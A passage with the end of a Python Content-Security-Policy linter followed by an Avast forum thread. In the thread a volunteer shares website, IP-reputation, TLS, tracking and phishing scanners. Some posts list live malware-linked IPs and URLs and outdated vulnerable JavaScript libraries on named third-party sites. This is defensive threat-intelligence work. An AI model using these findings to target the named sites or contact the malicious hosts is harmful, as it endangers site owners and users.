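    """'Strictly defined' in the report's sense: present, and limited to
    'none', 'self' or an explicit allowlist with no wildcard host, no bare
    scheme and no 'unsafe-*' keyword."""
    if not sources:
        return False
    for s in sources:
        if s == "*" or s.startswith("'unsafe-") or s in ("http:", "https:", "data:", "blob:"):
            return False
    return True


def lint_csp(header: str) -> dict[str, str]:
    """Return {finding: note} for the weaknesses the report above looks for;
    an empty dict means every check passed."""
    p = parse_csp(header)
    findings: dict[str, str] = {}
    # form-action and base-uri never fall back to default-src.
    if not any(is_strict(p.get(d)) for d in FORMJACKING):
        findings["Formjacking"] = "No CSP Protection"
    if not any(is_strict(p.get(d)) for d in CLICKJACKING):
        findings["Clickjacking"] = "No CSP Protection"
    # script-src does fall back to default-src when absent.
    if not is_strict(p.get("script-src", p.get("default-src"))):
        findings["XSS"] = "No CSP Protection"
    if "default-src" not in p:
        findings["default-src"] = "missing"
        for d in FETCH_DIRECTIVES:
            if d not in p:
                findings[d] = "missing"
    if "object-src" not in p and not is_strict(p.get("default-src")):
        findings["object-src"] = "missing; plugin injection possible"
    if "report-uri" not in p and "report-to" not in p:
        findings["report-uri"] = "missing; no violation reports"
    return findings


if __name__ == "__main__":
    for name, policy in (("sucuri", SUCURI_POLICY), ("hardened", HARDENED_POLICY),
                         ("designer", DESIGNER_POLICY)):
        print(name, lint_csp(policy) or "all checks passed")
```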
Title: Re: Tests and other Media topics
Post by: polonus on May 22, 2022, 11:56:25 AM
Tested forum.avast.com at The Markup,
and no tracking found, but user data are being sent to Google Analytics.
Adblockers will block this.

See: https://themarkup.org/blacklight?url=forum.avast.com

Site is non-indexable, links on the page are followed.
No unsafe content being detected, no iframe redirections, no encoded JS,
no external domain requests, no trackers.

polonus
Title: Re: Tests and other Media topics
Post by: polonus on June 07, 2022, 02:42:57 PM
Sometimes one has to combine resources, like here on this Crimson RAT Malware:
https://urlhaus.abuse.ch/url/2228451/  and  https://any.run/malware-trends/crimson
and https://www.shodan.io/host/64.188.25.143
This while only 3 vendors detect this here: https://www.virustotal.com/gui/url/022eb1cfa39cf0b2f63fef31c878545716b766c2cd37d59d61e8cc93d876259e
Blacklisted by McAfee: https://sitecheck.sucuri.net/results/64.188.25.143/day.txt
All this abuse despite a very strict abuse policy from -static.quadranet dot com.
Not yet reported here, but similar to spam and scam reported for this IP:
https://www.abuseipdb.com/check/64.188.2.110 @ quadranet dot com.
polonus (volunteer 3rd party cold recon website security analyst and website error-hunter)
Title: Re: Tests and other Media topics
Post by: polonus on June 13, 2022, 12:26:49 AM
Tracking information -
Re: https://confection.io/trackers/eu-eb2-3lift-com/
Re: https://www.joesandbox.com/analysis/257195/0/html

polonus
Title: Re: Tests and other Media topics
Post by: polonus on June 18, 2022, 06:07:17 PM
And again we have lost some fine initiative for checking on Bad IPs at -https://ip-46.com/feeds
as that service was discontinued quite recently, a site where I personally reported many a bad IP feed.

We still have this (random example): https://www.abuseipdb.com/check/82.174.251.216
and various other resources, but we have lost quite some valuable evaluation resources over time,
also because these resources came under continuous attack from malcreants-cybercriminals
or they did not get the support to pay for the "wires" and server-service. A pity really.

polonus (volunteer 3rd party cold recon website security analyst and website error-hunter)
Title: Re: Tests and other Media topics
Post by: polonus on June 18, 2022, 09:45:18 PM
Here we will take scan results from three different scan sources.

On the malcode detection of Remcos RAT: https://urlhaus.abuse.ch/url/2243687/

Then the according VT report: https://www.virustotal.com/gui/url/6f4bf2ffc13b812ff7cc353c8e6d310c038e9ea2fc38ce026d9807e3363df782
with three av-vendors flagging this malcode.

This website loads trackers on your computer that are designed to evade third-party cookie blockers.
Canvas fingerprinting was detected on this website. This technique is designed to identify users even if they block third-party cookies. It can be used to track users' behavior across sites. This technique was used by six percent of popular sites when we scanned them in September 2020.

Blacklight detected a script loaded from filebin.net doing this on this site.

It secretly draws the following image on your browser when you visit this website for the purpose of identifying your device.

However...https://themarkup.org/blacklight?url=filebin.net ->
While Blacklight accurately detects the presence of canvas fingerprinting on a website, it cannot determine if the purpose is user behavior monitoring or for fraud prevention or bot detection.

pol
Title: Re: Tests and other Media topics
Post by: polonus on June 18, 2022, 10:17:12 PM
Another pair to combine: https://www.projecthoneypot.org/list_of_ips.php

Re: https://www.abuseipdb.com/check/46.101.210.101
and
https://maltiverse.com/ip/46.101.210.81

Given with associated harvesters: https://www.projecthoneypot.org/ip_46.101.210.101

proxy also listed here: https://www.freeproxy.world/?type=socks4

polonus
Title: Re: Tests and other Media topics
Post by: polonus on June 19, 2022, 04:38:59 PM
Blacklisted and 8 vendors flag:
https://urlhaus.abuse.ch/url/2244605/
See: https://whatismyip.live/blacklist-check
Blacklist Status for your IP: 42.239.97.158
Blacklist   Description   Status
dnsbl.spfbl.net   DNSBL SPFBL List   Listed
red.uribl.com   URIBL red   Listed
grey.uribl.com   URIBL grey   Listed
black.uribl.com   URIBL black   Listed
multi.uribl.com   URIBL multi   Listed
-> https://www.virustotal.com/gui/url/ecf4af28e2e9081ecbf2699669cdcd4c99230ac83576d52f096a81ccf918dc6a/community

Abuse on China's backbone (general information)  https://www.shodan.io/host/42.239.97.158

Top Hacker: https://community.sophos.com/utm-firewall/f/network-protection-firewall-nat-qos-ips/39664/top-hacker-hn-kd-ny-adsl

and how he plays a role in China's attempts to block Tor (scanning for Tor bridges) and other abuse:
https://dontai.com/wp/2016/06/08/hn-kd-ny-adsl-research-ban/

Completely missed here: https://blacklistchecker.com/check?input=42.239.97.158
Flagged here: https://www.blacklistmaster.com/check?t=42.239.97.158  (given on 3 lists).

polonus
Title: Re: Tests and other Media topics
Post by: polonus on June 21, 2022, 10:32:24 PM
See how Google Chrome makes user tracking through installed extensions possible.

This can be achieved via web-accessible-resources.
Secret tokens of extensions cannot hide their existence from a specific timing method;
the more extensions installed, the more precise and unique your browser fingerprint will be.

https://developer.chrome.com/docs/extensions/mv3/manifest/web_accessible_resources/

Firefox browser is not vulnerable to this sort of user tracking.

Scan here: https://z0ccc.github.io/extension-fingerprints/

Test here: https://coveryourtracks.eff.org/kcarter?aat=1   (for other browser-tracking methods)
Most characteristics are derived via JavaScript, a decent script blocker of sorts is a must nowadays,
as most monoculture browsers come as user tracking tools par excellence.

polonus
Title: Re: Tests and other Media topics
Post by: polonus on June 29, 2022, 06:42:26 PM
Verification of IP: https://greensnow.co/statistics
and https://greensnow.co/view/46.161.27.204#listeAttaques

see also: https://www.abuseipdb.com/check/46.161.27.204

polonus
Title: Re: Tests and other Media topics
Post by: polonus on July 03, 2022, 06:36:00 PM
Other fine resources to check suspicious IP against:
https://cleantalk.org/blacklists/23.133.8.3  (random tor-address example given)

polonus
Title: Re: Tests and other Media topics
Post by: polonus on July 08, 2022, 08:13:33 PM
Observed activity, but only one vendor to flag ....
Re: https://viz.greynoise.io/ip/223.205.232.52
On IP address: https://db-ip.com/223.205.232.52
1 security vendor flags it: https://www.virustotal.com/gui/ip-address/223.205.232.52/detection
Nothing here while there is vulnerable & abusable smbv1 there:
https://cleantalk.org/blacklists/223.205.232.52

pol
Title: Re: Tests and other Media topics
Post by: polonus on July 09, 2022, 02:27:21 PM
Checking for a Magento webshop site (random example):
(cold recon 3rd party scan results): https://www.magereport.com/scan/?s=https%3A%2F%2Fwww.tdcautomotive.com%2F
& https://webscan.foregenix.com/webscan_results.html?scanid=15f45d6b_1348_41e2_8375_ca2101279684&type=2&emailaddress=
& https://magentary.com/magento-security-patch-tester/
SSL checker results
Quote
Resolves to   -www.tdcautomotive.com
Expiration date   Jun 17, 2023
Vendor signed   No
Hostname   Doesn't Match
Key length   2048
Server type   NA
Common name   -tdcautomotive.com
SAN   -tdcautomotive.com, -www.tdcautomotive.com
Organization   Starfield Technologies, Inc.
Common name   Starfield Secure Certificate Authority - G2 Starfield Secure Certificate Authority - G2
Serial number   a4:36:46:d1:88:8f:65:d7
Signature algorithm   sha256WithRSAEncryption
Fingerprint (SHA-1)   C4DD2404FFA414580125E5A6DD936D4854750A13
Fingerprint (MD5)   C7DECE69DB4AEE913298BBDA0C40BC48

Retire.js results:
Quote
jquery   1.12.4   Found in
-https://www.tdcautomotive.com/pub/static/frontend/Smartwave/porto/en_GB/jquery.js _____Vulnerability info:
Medium   2432 3rd party CORS request may execute CVE-2015-9251   
Medium   CVE-2015-9251 11974 parseHTML() executes scripts in event handlers   
Medium   CVE-2019-11358 jQuery before 3.4.0, as used in Drupal, Backdrop CMS, and other products, mishandles jQuery.extend(true, {}, ...) because of Object.prototype pollution   
Medium   CVE-2020-11022 Regex in its jQuery.htmlPrefilter sometimes may introduce XSS   
Medium   CVE-2020-11023 Regex in its jQuery.htmlPrefilter sometimes may introduce XSS   
knockout   3.4.2   Found in
htxps://www.tdcautomotive.com/pub/static/frontend/Smartwave/porto/en_GB/knockoutjs/knockout.js _____Vulnerability info:
Medium   XSS injection point in attr name binding for browser IE7 and older
NO CSP POLICIES FOUND.
Vulnerabilities
Another scan delivers - low risk established
https://www.magereport.com/scan/?s=https%3A%2F%2Fros.your-printq.com%2F

But vulnerabilities were detected on the server behind that website, given here: https://www.shodan.io/host/185.137.171.10

polonus (volunteer 3rd party cold recon website security analyst and website error-hunter)
Title: Re: Tests and other Media topics
Post by: polonus on July 09, 2022, 11:24:06 PM
Scanning starting from a suspicious or insecure IP address:
https://www.projecthoneypot.org/ip_185.199.159.155
https://www.shodan.io/host/185.199.159.155
Nothing detected here: https://check.trendmicro.com/page/QuickStart?s=agrdy.com
Error and insecure connection (unsafe): http://185-199-159-155.xyz.agrdy.com/
VT somehow cannot resolve address (down?): https://www.virustotal.com/gui/url/3d7aadb8d64a2efc5938be4c206c68a28bc177bf1fbb32d799aa3fde73669b63?nocache=1
Re: https://intelx.io/?did=0906af8d-ea43-4d29-8582-0a8ad20deee4
See: https://sitecheck.sucuri.net/results/www.agentsuccesslab.com  (error).
Went full round: https://db-ip.com/137.175.69.54

Have a nice new week,

pol
Title: Re: Tests and other Media topics
Post by: DavidR on July 10, 2022, 12:35:12 AM
Hi Pol,

Want to take a look at this one - https://forum.avast.com/index.php?topic=320277.0 - a bit weird youtube playlists causing avast to alert.
Title: Re: Tests and other Media topics
Post by: polonus on July 10, 2022, 12:43:56 PM
Hi DavidR,

I did so in that thread, please read there.

Nice resources to give back to this community, that also found up on such CDNs as inherited,
like -> https://domain.opendns.com/yt3.ggpht.com

DNS services, that is to say sometimes vital and sometimes rather questionable services.

Have a nice Sunday,

polonus
Title: Re: Tests and other Media topics
Post by: polonus on July 10, 2022, 04:55:11 PM
Check dns for being blacklisted: https://www.dnsbl.info/
This domain is now for sale:
Re: https://www.dnsblacklist.org/?domain=dul.ru
Quote

-dul.ru
31.177.80.70
Russia

Result
Not blocked anywhere.

Check spam IPs here: https://glockapps.com/blacklist/all-s5h-net/

pol
Title: Re: Tests and other Media topics
Post by: DavidR on July 10, 2022, 05:26:51 PM
Hi DavidR,

I did so in that thread, please read there.
<snip>

Have a nice Sunday,

polonus

I have seen it thanks.

Great Sunday here, hot as hades right now, watching the Wimbledon men's singles final right now.  I hope you are enjoying the good weather also.

It was pretty hot on my morning exercise too, I was out just before 12PM, sweating buckets.
Title: Re: Tests and other Media topics
Post by: polonus on July 16, 2022, 07:17:49 PM
Additionally to this being checked here: https://www.dnsblacklist.org/?domain=dul.ru
Re: https://github.com/NethServer/dns-community-blacklist/blob/master/adguarddns.dns
Compare results ->
Flagged but not being blocked according to what results we got here:
https://www.dnsblacklist.org/?domain=advantageglobalmarketing.com
blocked inside browsers with adblockers because of this Easylist filter:
-||advantageglobalmarketing dot com^

Quote
We will test your domain name against 17 of the most popular public DNS resolvers available.

AdGuard
CleanBrowsing
CloudFlare 1.1.1.1
CloudFlare 1.1.1.3 (Family Filter)
Norton ConnectSafe
Google 8.8.8.8
OpenDNS Family
Quad9
Yandex DNS
Comodo Secure DNS

Check page for DNS via IP: https://matrix.spfbl.net/en/134.209.188.55

polonus
Title: Re: Tests and other Media topics
Post by: polonus on July 25, 2022, 05:26:35 PM
All attack samples given here: https://www.thegeekstuff.com/2012/02/xss-attack-examples/
were detected by Malware Script Detector v. 02b run in Tampermonkey extension.
Given in as a Yahoo query this script 'barked' and blocked access.
Example of such a query blocked:
Quote
htxps://github.com/OWASP/CheatSheetSeries/blob/master/cheatsheets/DOM_based_XSS_Prevention_Cheat_Sheet.md
semgrep.dev./s/we30
hxtps://itigic.com/find-xss-vulnerabilities-with-findom-xss-scanner/

Console messages: Mixed Content: The page at 'httxs://www.threeworldwars.com/world-war-3/ww3.htm' was loaded over a secure connection, but contains a form that targets an insecure endpoint 'htxp://www.google.com/custom'. This endpoint should be made available over a secure connection.
-ww3.htm:1 Mixed Content: The page at 'htxps://www.threeworldwars.com/world-war-3/ww3.htm' was loaded over HTTPS, but requested an insecure script 'hxtp://www.google-analytics.com/urchin.js'. This request has been blocked; the content must be served over HTTPS.
-ww3.htm:647 Uncaught ReferenceError: urchinTracker is not defined
    at -ww3.htm:647
-ww3.htm:650 A parser-blocking, cross site (i.e. different eTLD+1) script, -htxps://ssl.google-analytics.com/ga.js, is invoked via document.write. The network request for this script MAY be blocked by the browser in this or a future page load due to poor network connectivity. If blocked in this page load, it will be confirmed in a subsequent console message. See
-htxps://www.ch40mestatus.qjz9zk/feature/5718547946799104 for more details.
(anonymous) @ -ww3.htm:650
-ww3.htm:650 A parser-blocking, cross site (i.e. different eTLD+1) script, -https://ssl.google-analytics.com/ga.js, is invoked via document.write. The network request for this script MAY be blocked by the browser in this or a future page load due to poor network connectivity. If blocked in this page load, it will be confirmed in a subsequent console message. See htxps://www.ch40mestatus.qjz9zk/feature/5718547946799104 for more details.
(anonymous) @ ww3.htm:650
-ga.js:1 Failed to load resource: net::ERR_BLOCKED_BY_CLIENT
-adsbygoogle.js:1 Failed to load resource: net::ERR_BLOCKED_BY_CLIENT
-connect.facebook.net/en_US/all.js#xfbml=1:1 Failed to load resource: net::ERR_BLOCKED_BY_CLIENT
-e8af8301-45e2-41c6-9212-9421ce1b1dc7.js:1 Failed to load resource: net::ERR_BLOCKED_BY_CLIENT
-sp.js:1 Failed to load resource: net::ERR_BLOCKED_BY_CLIENT
-onLoadModule.js:72 ...Selector Finder is running...
VM51:1 Uncaught ReferenceError: popWin is not defined
    at <anonymous>:1:1
3rd party cookie issues: Mixed content: load all resources via HTTPS to improve the security of your site

Enjoy,

polonus (- and x added in quote by me for obvious reason)
Title: Re: Tests and other Media topics
Post by: polonus on July 26, 2022, 11:35:05 PM
Next through avast protect your privacy against mass surveillance and total control measures:
-> privacytools.io

When not strictly obligatory, do not enter personally identifiable data when you can avoid it;
use an alias instead. Do not share data online that you would not already share with all of the globe,
because that is where all data goes on Interwebz.

Always keep this reasoning at the back of your heads, folks.
Once bitten, twice shy, and don't take coal to Newcastle (...they already have plenty of that there)  :D .

polonus
Title: Re: Tests and other Media topics
Post by: polonus on August 10, 2022, 10:22:45 PM
Check on tracking and for insecure tracking methods here:
https://reports.exodus-privacy.eu.org/

polonus
Title: Re: Tests and other Media topics
Post by: polonus on August 23, 2022, 01:10:02 PM
It is advisable to check on Android, through the VirusTotal app for example, all app permissions you granted.

What permissions to avoid?

See:  HTTPS://www.online-tech-tips.com/smartphones/30-app-permissions-to-avoid-on-android/
Source Guy McDowell

polonus



Title: Re: Tests and other Media topics
Post by: bob3160 on August 23, 2022, 02:42:39 PM
The correct link is:
https://www.online-tech-tips.com/smartphones/30-app-permissions-to-avoid-on-android/
Title: Re: Tests and other Media topics
Post by: polonus on September 02, 2022, 12:05:40 AM
Test security of your website here: https://en.internet.nl

polonus
Title: Re: Tests and other Media topics
Post by: polonus on September 17, 2022, 04:49:34 PM
One can perform a quick and dirty WordPress security scan for a website with WordPress CMS here: https://hackertarget.com/wordpress-security-scan/

Mind that the Word Press CMS version update comes faster than given there.

Scanned a random WP site there: -https://ufoholic.com/

Found following issues:
Quote
The following plugins were detected by reading the HTML source of the WordPress sites front page.

Plugin   Update Status   About
popup-builder 4.1.9   Warning   latest release (4.1.13)
https://popup-builder.com
ultimate-social-media-icons 2.7.5   Warning   latest release (2.7.7)
http://ultimatelysocial.com
Plugins are a source of many security vulnerabilities within WordPress installations, always keep them updated to the latest version available and check the developers plugin page for information about security related updates and fixes.

There are likely more plugins installed than those listed here as the detection method used here is passive. While these results give an indication of the status of plugin updates, a more comprehensive assessment should be undertaken by brute forcing the plugin paths  using a dedicated tool.

Linked sites given the all green as well as JS links.
Quote
File not found for me because blocked: File not found: hxtps://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js?client=ca-pub-8450070672787649

Retirable code found up with retire.js
Quote
jquery-ui   1.13.1   Found in hxtps://ufoholic.com/wp-includes/js/jquery/ui/core.min.js?ver=1.13.1 _____Vulnerability info:
Medium   CVE-2022-31160 XSS when refreshing a checkboxradio with an HTML-like initial text label   

polonus
Title: Re: Tests and other Media topics
Post by: polonus on September 20, 2022, 03:39:19 PM
For those developers into javascript security.

Different findings from retire.js and otto.js extensions inside a chromium browser.

Both extensions are developers' helping tools:
Retire.js alerts retirable js libraries (outdated & vulnerable).
Otto.js extension checks on the visiting webpage for security issues like Tracking scripts, Data Stealing, Malware and Weak site security, it will also alert for vulnerable javascript as retire.js does.

Otto.js for this avast forum website alerts for a tracking script by kslogs.ru.

Although Google gives it the all green (pretty safe), webrate frowns upon it:
https://webrate.org/site/kslogs.ru/

Also see: -> https://www.virustotal.com/gui/url/66c6ed4e40e622a8c6ca05ada7e2cf2a46d86eb54877bf1eed925964ad40627c/details

Erlend Oftedal's retire.js has no alerts whatsoever for this here webforum site.

polonus (volunteer 3rd party cold reconnaissance website security analyst and website error-hunter)


Title: Re: Tests and other Media topics
Post by: polonus on September 25, 2022, 03:03:40 PM
Went over to VirusTotal to check on an alleged DOS-attack undertaken from -js.stripe.com via -m.stripe.network on the -www.unz.com website.

A rescan for the finalizing scan results was only available for privileged users,
so I launched an anonymous  search here:
https://packettotal.com/app/analysis?id=57809fff9e90ae7dc08403185cd44569&name=conn

What came up there were all Wireshark packet scans (connection and others).

Packettotal, quite nice resources,

polonus
Title: Re: Tests and other Media topics
Post by: polonus on September 28, 2022, 03:56:46 PM
Scan tools resources being worked around here: https://www.dshield.org/tools/

pol
Title: Re: Tests and other Media topics
Post by: DavidR on September 28, 2022, 04:17:34 PM
Scan tools resources being worked around here: https://www.dshield.org/tools/

pol

Bookmarked, thanks.
Title: Re: Tests and other Media topics
Post by: polonus on September 28, 2022, 04:46:13 PM
Example: https://www.dshield.org/tools/dnslookup.html

Interesting in the light of this news: https://www.quad9.net/news/blog/an-update-to-the-quad9-and-sony-music-german-court-injunction-august-2022/

And these recommendations: https://bgr.com/guides/the-best-free-and-public-dns-servers-in-2022/

Issues like no security support for non-business users and/or no ad-blocking at Cloudflare's, for instance, could be serious considerations in choosing what DNS to use. On Windows one could use DNS Jumper v2 to change one's DNS on the fly.

polonus
Title: Re: Tests and other Media topics
Post by: polonus on September 29, 2022, 02:30:52 PM
TLS Checker with instant results to be found here: https://www.cdn77.com/tls-test

Moderate: version 1.2 found to reside here: https://www.cdn77.com/tls-test/result?domain=forum.avast.com

Check also with otto for Chrome: no Tracking Scripts, no Data Stealing, no Malware, no Weak Security.

Also has a CSP designer on board, example:
Quote
default-src 'self' ; worker-src 'self' blob: ; script-src 'self' 'unsafe-eval' 'unsafe-inline'

polonus
Title: Re: Tests and other Media topics
Post by: polonus on October 02, 2022, 02:07:55 PM
Website scan sites to check on a potential phish:

https://easydmarc.com/tools/phishing-url   &   https://checkphishing.com/

In this case 5 vendors at VT also flag this as a PHISH:
https://www.virustotal.com/gui/url/a84de0bf2fb6d844449b6d785597b2cf5b28c178021632ba34b5e50df5e5f25f

while that website's IP is only being flagged by one instance here:
https://www.virustotal.com/gui/ip-address/155.94.143.206

while here all instances were given:
https://www.virustotal.com/gui/ip-address/155.94.143.206/relations

So we will look for ASN-QUADRANET-GLOBAL abuse at URLHAUS, cleantalk.org, ip.lookup.org.
VPN/TOR/Proxy: Likely (and also abuse) 4% online malware
-> https://www.ip-lookup.org/location/155.94.143.206/

polonus


Title: Re: Tests and other Media topics
Post by: polonus on October 21, 2022, 11:34:31 AM
You are being tracked inside your browser all over the Internet.
Do not feed data that you do not want to share with the world and land on all sort of desks.

Who is tracking you? An extension to see what goes on is the "Who is tracking me" extension.

Reporting here for instance on a website for a big national Dutch newspaper
38 instances of GStatics tracking, -googleapis.com and -privacy-centre.org

Disconnect extension only flags 3. Brave shield blocks 2.

We found one unhandled JavaScript error:
Quote
Unhandled JavaScript Error
at window.console.error (<anonymous>:1:649) at hxtps://www.telegraaf.nl/:17:23 at patchedCallback (<anonymous>:132:45)
Error at 17:23 of hxtps://www.telegraaf.nl/


polonus
Title: Re: Tests and other Media topics
Post by: polonus on October 26, 2022, 01:09:12 PM
All Chromium-based browsers may leak your local IP.

Test here: https://niespodd.github.io/webrtc-local-ip-leak/

Then this WebRTC Control extension will prevent leakage:
https://chrome.google.com/webstore/detail/webrtc-control/fjkmabmdepjfammlpliljpnbhleegehm

polonus
Title: Re: Tests and other Media topics
Post by: polonus on October 26, 2022, 03:39:40 PM
Where the threat was being reported: https://urlhaus.abuse.ch/url/2385725/

Where it was detected as not to be scanned: https://sitecheck.sucuri.net/results/warukraine.co/un/nsittes

Where the IP address was being scanned by Threat Analysis: https://jamesbrine.com.au/213.229.66.214/

Flagged as suspicious by one vendor here: https://www.virustotal.com/gui/url/749739209e87e4fda855f3a47713d1f4317a74ea44bdae86c6e8199bd4adcb7b
Categorized as compromised website - https://www.virustotal.com/gui/url/749739209e87e4fda855f3a47713d1f4317a74ea44bdae86c6e8199bd4adcb7b/details

polonus (volunteer 3rd party cold recon website security analyst and website error-hunter)
Title: Re: Tests and other Media topics
Post by: polonus on November 10, 2022, 03:11:27 PM
IP blacklist checking for a server address used by MBAM:
https://www.ip-tracker.org/blacklist-check.php?ip=Sirius.mwbsys.com

polonus
Title: Re: Tests and other Media topics
Post by: polonus on November 17, 2022, 12:38:31 PM
Tested my adblocking in the latest beta version of the Avast Secure Browser.

Likely you would like to test also, then go here: https://adblock-tester.com/
(made by matuhin dot ru) (P.S. your English seems fine to me).

Enjoy my friends,

By the way, I had the full 100 points out of 100:
Quote
This is the most common form of advertising and tracking on the internet. It’s very easy for website owners to set up. These services collect data about you in order to find the right advertisement for you.

Script loading:  ✅ test passed
Block visibility:  ✅ test passed
Script loading:  ✅ test passed
Block visibility:  ✅ test passed
Script loading:  ✅ test passed
Block visibility:  ✅ test passed
medium
These services monitor your actions on the site and collect information about you. They are needed only by the owner of the site, for the user it is only unnecessary requests and the code that needs to be executed. Unfortunately, blocking them sometimes can completely break the site.

Script loading:  ✅ test passed
Script execution:  ✅ test passed
Script loading:  ✅ test passed
Script execution:  ✅ test passed
low
This type of advertising is often used on large websites that sell ad space. It is difficult to block because it is difficult to distinguish between an advertising image and a regular image. Often the rules are written for each site separately, so this check is not entirely accurate. It only checks for the presence of keywords in the file path and the availability of Flash.

File loading:  ✅ test passed
Block visibility:  ✅ test passed
File loading:  ✅ test passed
Block visibility:  ✅ test passed
File loading:  ✅ test passed
Block visibility:  ✅ test passed
low
Unlike analytics tools, these services are used to track and measure errors on websites. Services monitor almost all user actions so that the error message is as complete as possible. Most often, if you turn these off, nothing will break.

Script loading:  🏳️ unable to check (possibly due to service security settings)
Script execution:  ✅ test passed
Script loading:  ✅ test passed
Script execution:  ✅ test passed
100 points out of 100
(10 services, 20 cheks)

polonus (volunteer 3rd party cold reconnaissance website security analyst and website error-hunter)
Title: Re: Tests and other Media topics
Post by: polonus on November 17, 2022, 01:37:41 PM
PrivacyGuides.org
The guide to restoring your online privacy

https://www.privacyguides.org

pol
Title: Re: Tests and other Media topics
Post by: polonus on November 29, 2022, 10:27:53 PM
Various scanners to scan scam websites

urlscan.io
www.emailveritas.com   
www.scamvoid.net
www.scam-detector.com 
www.scamaider.com

for tracking apps:  reports.exodus-privacy.eu.org   

website scanner:
ionos.com/tools/website-checker     
sitecheck.sucuri.net

enjoy,

polonus
Title: Re: Tests and other Media topics
Post by: polonus on December 14, 2022, 01:10:54 PM
In the light of all the data breaches on websites and recent SSL vulnerabilities through heap overflow (fortinet's etc.) it is advisable to do a thorough SSL Server Test, like:
https://www.ssllabs.com/ssltest/analyze.html?d=fortinet.com  (also check with  certview there).

At SSLBL.abuse.ch for detecting malicious SSL Threats, at www.zscaler.com

SSL Certificate Chain analysis at vulners.com.
Using the SSL Checker at www.sslshopper.com.

Online SSL Scan at hackertarget.com  &  SSL Scanner report at www.ssltools.com

Enjoy,

polonus
Title: Re: Tests and other Media topics
Post by: polonus on December 17, 2022, 10:26:38 AM
Why do so many websites lack a decent CSP policy?

Like these here forums. F-grade result:
CSP Protection: None
CSP Reporting: Missing
CSP Validity: Invalid
XSS: No CSP Protection
Clickjacking: No CSP Protection
Formjacking: No CSP Protection
General: No CSP Protection

You could argue, they just provide plain content, so they do not need CSP,
but what in view of all the forum-spam to be cleansed?

Just check your CSP scanner extension; these are always penny-wise, pound-foolish policies.

Also use this: https://csp-evaluator.withgoogle.com/
Check with: https://cspvalidator.org/#url=https://forum.avast.com

No CSP policies in headers or meta elements found at -https://forum.avast.com/

polonus
Title: Re: Tests and other Media topics
Post by: polonus on December 26, 2022, 01:12:52 PM
The information gained here could also be important in combination with a website security scan,
for instance via nibbler: https://nibbler.insites.com/en_US/

polonus
Title: Re: Tests and other Media topics
Post by: polonus on January 22, 2023, 01:17:57 PM
With Let's Encrypt we will basically have to trust DNS.

Check DNS with Nir Sofer's tool: DNSDataView (combined with his tool IPNetinfo).

Online check with: DNSSec Analyzer dnssec-debugger.verisignlabs.com
and re-check with DNSViz at dnsviz.net

(Mind you that at dnsviz.net you will also communicate with Twitter,
unless you have blocked that with NoScript for example.
Check for Twitter by searching nitter.eu or nitter.it.)

Important to check DNS, because certain Android-malware may change DNS-settings.

Be vigilant,

polonus
Title: Re: Tests and other Media topics
Post by: polonus on February 07, 2023, 10:39:09 PM
Do a website scan with Snyk, and take a glance over the Web Page Test details,
a random example with the waterfall results, you can find it here:

https://www.webpagetest.org/result/230207_BiDcQ5_JAR/1/details/#waterfall_view_step1

You probably also experience what my browser had blocked (ad-blocker and tracking blocks).

Enjoy, my good friends, enjoy,

pol
Title: Re: Tests and other Media topics
Post by: polonus on February 08, 2023, 06:16:27 PM
Marked malicious parked domain (9 vendors flag):

Website scan: https://urlscan.io/result/a89defce-9340-4fc5-a782-6ad9e958acb0/

Snyk vulnerability test scan results:
https://snyk.io/test/website-scanner/?test=230208_AiDc17_DJP&utm_medium=referral&utm_source=webpagetest&utm_campaign=website-scanner

Connection viewer etc.:
https://www.webpagetest.org/result/230208_AiDc17_DJP/1/details/#waterfall_view_step1

VT results - manifold flagged as malicious website:
https://www.virustotal.com/gui/url/93117aef5b2e4a3ca73fcbb03ad5f095f3452b4d04be5095f3588f5488751efc/details

On IP: https://www.abuseipdb.com/check/199.59.242.153

polonus
Title: Re: Tests and other Media topics
Post by: polonus on February 10, 2023, 10:57:01 PM
Various Spam IP scans:

https://www.abuseipdb.com/check/45.134.225.229

https://scamalytics.com/ip/45.134.225.229

https://cleantalk.org/blacklists/45.134.225.20

Verdict: spam and fraud.

pol
Title: Re: Tests and other Media topics
Post by: polonus on February 11, 2023, 12:29:33 PM
Server - RPKI Route Authorisation established:
https://en.internet.nl/site/server-99-84-160-58.ord52.r.cloudfront.net/1922370/

Giving an error here: https://sitereport.netcraft.com/?url=https://server-99-84-160-58.ord52.r.cloudfront.net

1 detected file: https://www.virustotal.com/gui/ip-address/99.84.160.58

polonus
Title: Re: Tests and other Media topics
Post by: polonus on February 12, 2023, 01:45:59 PM
Checked my desktop connections with Free Monitor and found connections with:
https://www.abuseipdb.com/check/13.107.42.16

One vendor to flag at VT's:
https://www.virustotal.com/gui/ip-address/13.107.42.16/detection

This before my browser even opened.

pol
Title: Re: Tests and other Media topics
Post by: polonus on February 13, 2023, 12:12:39 PM
I check my connections with a monitoring tool on Windows 11.

Re: https://scamalytics.com/ip/172.67.216.181  Fraud score: 38
Zero risk here with AKAMAI: https://scamalytics.com/ip/95.101.74.197 

polonus
Title: Re: Tests and other Media topics
Post by: polonus on February 16, 2023, 01:05:13 PM
Check your android apps tracking and permission score here:
https://exodus-privacy.eu.org/en/

polonus
Title: Re: Tests and other Media topics
Post by: polonus on February 25, 2023, 04:27:03 PM
As trust is being written in ever diminishing letters everywhere,
scan websites unknown to you here:

Random scan example: https://trustscam.nl/sgvps.net

Another one: https://www.ssltrust.com/ssl-tools/website-security-check?domain=torry.io

And of course you have the Avast Online Security & Privacy extension in the browser on board.  ;)

Enjoy, my friends, enjoy,

polonus (volunteer 3rd party cold recon website security-analyst and website error-hunter)
Title: Re: Tests and other Media topics
Post by: polonus on February 26, 2023, 05:27:08 PM
Internet outages: https://www.thousandeyes.com/outages/

As I write this, outages in Tokyo, Singapore and China.

pol
Title: Re: Tests and other Media topics
Post by: polonus on March 11, 2023, 02:19:59 PM
Website Tracking Scan -> https://themarkup.org/blacklight?url=

and https://cookie-scanner.com/

polonus
Title: Re: Tests and other Media topics
Post by: polonus on March 12, 2023, 05:44:15 PM
Almost all adblockers will flag and block this link, but it is not flagged at VT etc.

See: https://urlscan.io/result/4de5236a-9e1e-4499-afd4-66ea6463e278/

See also indicators thereof: https://urlscan.io/result/4de5236a-9e1e-4499-afd4-66ea6463e278/#indicators

Experience here that adblockers are among the most popular add-ons:
https://addons.mozilla.org/en-GB/firefox/search/?promoted=recommended&sort=users&type=extension

polonus
Title: Re: Tests and other Media topics
Post by: polonus on March 13, 2023, 06:15:38 PM
Checking PHISHING domains against a scanner:

Where known phishing domains were being listed: https://openphish.com/

One of them checked: https://www.isitphish.com/  -http://simulatedareas.com/
Given as safe:
73.4% Legitimate
